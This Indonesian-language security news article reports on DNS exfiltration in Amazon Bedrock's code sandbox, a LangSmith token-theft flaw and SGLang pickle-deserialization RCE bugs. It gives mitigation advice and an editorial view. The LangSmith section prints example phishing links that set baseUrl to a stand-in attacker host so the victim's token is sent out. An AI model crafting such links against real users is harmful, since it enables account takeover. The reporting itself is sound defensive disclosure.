Kerentanan AI di Amazon Bedrock, LangSmith, dan SGLang Picu Kebocoran Data dan RCE

Peneliti keamanan siber baru-baru ini mengungkap metode baru untuk melakukan pencurian data sensitif dari lingkungan eksekusi kode kecerdasan buatan (AI) melalui kueri sistem nama domain (DNS). Temuan ini menunjukkan celah keamanan serius pada layanan AI populer seperti Amazon Bedrock, LangSmith, dan SGLang yang berpotensi membuka jalan bagi pelaku ancaman untuk mengeksekusi kode jarak jauh (RCE) serta mengakses data penting secara ilegal.

Kerentanan DNS di Amazon Bedrock Memungkinkan Eksfiltrasi Data

Dalam laporan yang diterbitkan pada Senin, BeyondTrust mengungkap bahwa Amazon Bedrock AgentCore Code Interpreter dalam mode sandbox memungkinkan kueri DNS keluar yang bisa disalahgunakan untuk membangun shell interaktif dan melewati isolasi jaringan. Meski tidak memiliki identifier CVE, kerentanan ini memiliki skor CVSS sebesar 7,5 dari 10.

Amazon Bedrock AgentCore Code Interpreter adalah layanan terkelola penuh yang memungkinkan agen AI mengeksekusi kode secara aman di lingkungan sandbox terisolasi, sehingga beban kerja agen tidak dapat mengakses sistem eksternal. Layanan ini diluncurkan Amazon pada Agustus 2025.

"Fakta bahwa layanan ini memungkinkan kueri DNS meski dikonfigurasi tanpa akses jaringan, memberikan peluang bagi pelaku ancaman untuk membangun saluran kendali dan eksfiltrasi data melalui DNS," ujar Kinnaird McQuade, arsitek keamanan utama di BeyondTrust.

Dalam skenario serangan eksperimen, penyerang bisa memanfaatkan celah ini untuk:

• Membentuk saluran komunikasi dua arah menggunakan kueri dan respons DNS.
• Mendapatkan shell balik interaktif (reverse shell).
• Menyalurkan data sensitif melalui kueri DNS jika peran IAM memiliki izin akses ke sumber daya AWS seperti bucket S3 yang menyimpan data tersebut.
• Menjalankan perintah berbahaya melalui payload yang dikirim lewat DNS ke Code Interpreter.

Metode komunikasi melalui DNS ini memungkinkan penyerang untuk mengontrol Code Interpreter dengan perintah yang disimpan dalam catatan DNS A, lalu mengeksekusinya dan mengirimkan hasilnya kembali melalui kueri subdomain DNS.

Meskipun Code Interpreter memerlukan peran IAM untuk mengakses sumber daya AWS, kesalahan konfigurasi sederhana seperti pemberian peran berlebihan dapat memberikan akses luas terhadap data sensitif.

"Penelitian ini membuktikan bagaimana resolusi DNS dapat melemahkan jaminan isolasi jaringan pada interpreter kode yang disandbox," ujar BeyondTrust. "Penyerang dapat mengeksfiltrasi data sensitif dari sumber daya AWS yang diakses melalui peran IAM Code Interpreter, berpotensi menyebabkan downtime, kebocoran data pelanggan, atau penghapusan infrastruktur."

Setelah pengungkapan secara bertanggung jawab pada September 2025, Amazon menyatakan ini merupakan fungsi yang disengaja, bukan cacat, dan menyarankan pelanggan untuk menggunakan mode VPC daripada mode sandbox untuk isolasi jaringan yang lebih ketat. Amazon juga merekomendasikan penggunaan firewall DNS untuk memfilter lalu lintas DNS keluar.

"Untuk melindungi beban kerja sensitif, administrator harus menginventarisasi semua instance AgentCore Code Interpreter aktif dan segera migrasikan yang menangani data penting dari mode Sandbox ke mode VPC," kata Jason Soroko, senior fellow di Sectigo.

"Beroperasi di dalam VPC menyediakan infrastruktur yang diperlukan untuk isolasi jaringan yang kuat, memungkinkan penerapan grup keamanan ketat, ACL jaringan, dan firewall DNS Route53 untuk memantau serta memblokir resolusi DNS yang tidak sah. Tim keamanan juga harus secara ketat mengaudit peran IAM yang melekat, menegakkan prinsip hak istimewa paling sedikit untuk membatasi dampak potensi kompromi."

LangSmith Rentan terhadap Serangan Pengambilalihan Akun

Selain itu, Miggo Security mengungkapkan kerentanan keamanan berisiko tinggi pada LangSmith (CVE-2026-25750, skor CVSS 8,5) yang memungkinkan pencurian token dan pengambilalihan akun. Kerentanan ini memengaruhi versi self-hosted maupun cloud dan telah diperbaiki pada versi 0.12.71 yang dirilis Desember 2025.

Celah ini terjadi akibat injeksi parameter URL tanpa validasi pada parameter baseUrl, yang memungkinkan penyerang mencuri token bearer pengguna yang sedang masuk, ID pengguna, dan ID workspace dengan mengelabui korban mengklik tautan berbahaya seperti:

• Cloud: smith.langchain[.]com/studio/?baseUrl=https://attacker-server.com
• Self-hosted: <domain LangSmith pelanggan>/studio/?baseUrl=https://attacker-server.com

Eksploitasi sukses memungkinkan penyerang mengakses riwayat jejak AI, serta mengungkap kueri SQL internal, data CRM pelanggan, dan kode sumber rahasia melalui tinjauan panggilan alat.

"Pengguna LangSmith yang sedang login dapat dikompromikan hanya dengan mengunjungi situs yang dikontrol penyerang atau mengklik tautan berbahaya," kata peneliti Miggo, Liad Eliyahu dan Eliana Vuijsje.

"Kerentanan ini mengingatkan bahwa platform observabilitas AI kini menjadi infrastruktur penting. Sementara platform ini mengutamakan fleksibilitas developer, mereka sering melewatkan pengamanan yang ketat. Risiko bertambah karena AI Agent memiliki akses dalam ke sumber data internal dan layanan pihak ketiga."

Kerentanan Deserialisasi Pickle Tidak Aman di SGLang

Framework open-source populer untuk menjalankan model bahasa besar dan AI multimodal, SGLang, juga ditemukan memiliki kerentanan yang dapat memungkinkan eksekusi kode jarak jauh melalui deserialisasi pickle yang tidak aman.

Peneliti Orca Security, Igor Stepansky, menemukan beberapa celah belum diperbaiki, yaitu:

• CVE-2026-3059 (skor CVSS 9,8): Eksekusi kode jarak jauh tanpa autentikasi via broker ZeroMQ (ZMQ) yang mendeserialisasi data tidak terpercaya menggunakan pickle.loads(). Mempengaruhi modul generasi multimodal SGLang.
• CVE-2026-3060 (skor CVSS 9,8): Eksekusi kode jarak jauh tanpa autentikasi melalui modul disaggregasi yang juga menggunakan pickle.loads() tanpa autentikasi. Mempengaruhi sistem disaggregasi paralel encoder SGLang.
• CVE-2026-3989 (skor CVSS 7,8): Penggunaan fungsi pickle.load() yang tidak aman tanpa validasi pada replay_request_dump.py, memungkinkan dieksploitasi dengan file pickle berbahaya.

Menurut Igor Stepansky, dua kerentanan pertama memungkinkan eksekusi kode jarak jauh tanpa autentikasi terhadap semua deployment SGLang yang mengekspos fitur multimodal atau disaggregasi ke jaringan. Kerentanan ketiga terdapat pada utilitas replay crash dump.

Advisori terkoordinasi dari CERT Coordination Center (CERT/CC) menegaskan bahwa jika modul tersebut aktif dan port TCP broker ZMQ diketahui serta dapat diakses, penyerang dapat mengirim file pickle berbahaya untuk mengeksploitasi kerentanan ini.

Pengguna SGLang dianjurkan untuk membatasi akses interface layanan hanya untuk jaringan tepercaya, menerapkan segmentasi jaringan, dan kontrol akses yang ketat untuk mencegah interaksi tidak sah dengan endpoint ZeroMQ.

Meski belum ada bukti eksploitasi di lapangan, penting untuk memantau aktivitas tidak biasa seperti koneksi TCP masuk ke port broker ZeroMQ, proses anak tak dikenal yang dijalankan oleh proses Python SGLang, pembuatan file di lokasi mencurigakan, dan koneksi keluar ke tujuan tidak dikenal.

Analisis Redaksi

Menurut pandangan redaksi, serangkaian kerentanan ini menunjukkan betapa kompleks dan rentannya ekosistem AI modern, terutama yang mengandalkan layanan cloud dan framework open-source. Amazon Bedrock yang seharusnya menjamin isolasi dan keamanan dalam eksekusi kode ternyata masih bisa dilewati melalui celah DNS, menimbulkan risiko besar bagi organisasi yang menyimpan data sensitif di AWS.

Di sisi lain, kerentanan di LangSmith dan SGLang memperlihatkan bahwa keamanan AI tidak hanya soal model dan algoritma, tetapi juga infrastruktur pendukung seperti platform observabilitas dan framework yang digunakan. Pengabaian validasi input dan mekanisme deserialisasi yang tidak aman dapat menjadi pintu masuk bagi peretas untuk mengambil alih akun, mencuri data, hingga menjalankan kode berbahaya.

Ke depan, pengguna dan penyedia layanan AI harus lebih waspada dan proaktif dalam menerapkan prinsip keamanan siber terbaik seperti least privilege, isolasi jaringan yang ketat, dan audit rutin. Selain itu, pembaruan dan patch keamanan harus segera diterapkan untuk mengurangi risiko eksploitasi. Keamanan AI bukan hanya tanggung jawab pengembang, tapi juga pengguna dan penyedia layanan cloud.

Dengan terus berkembangnya penggunaan AI dalam berbagai sektor, penting bagi pemangku kepentingan untuk terus mengikuti perkembangan dan mitigasi kerentanan demi menjaga integritas, kerahasiaan, dan ketersediaan data serta sistem.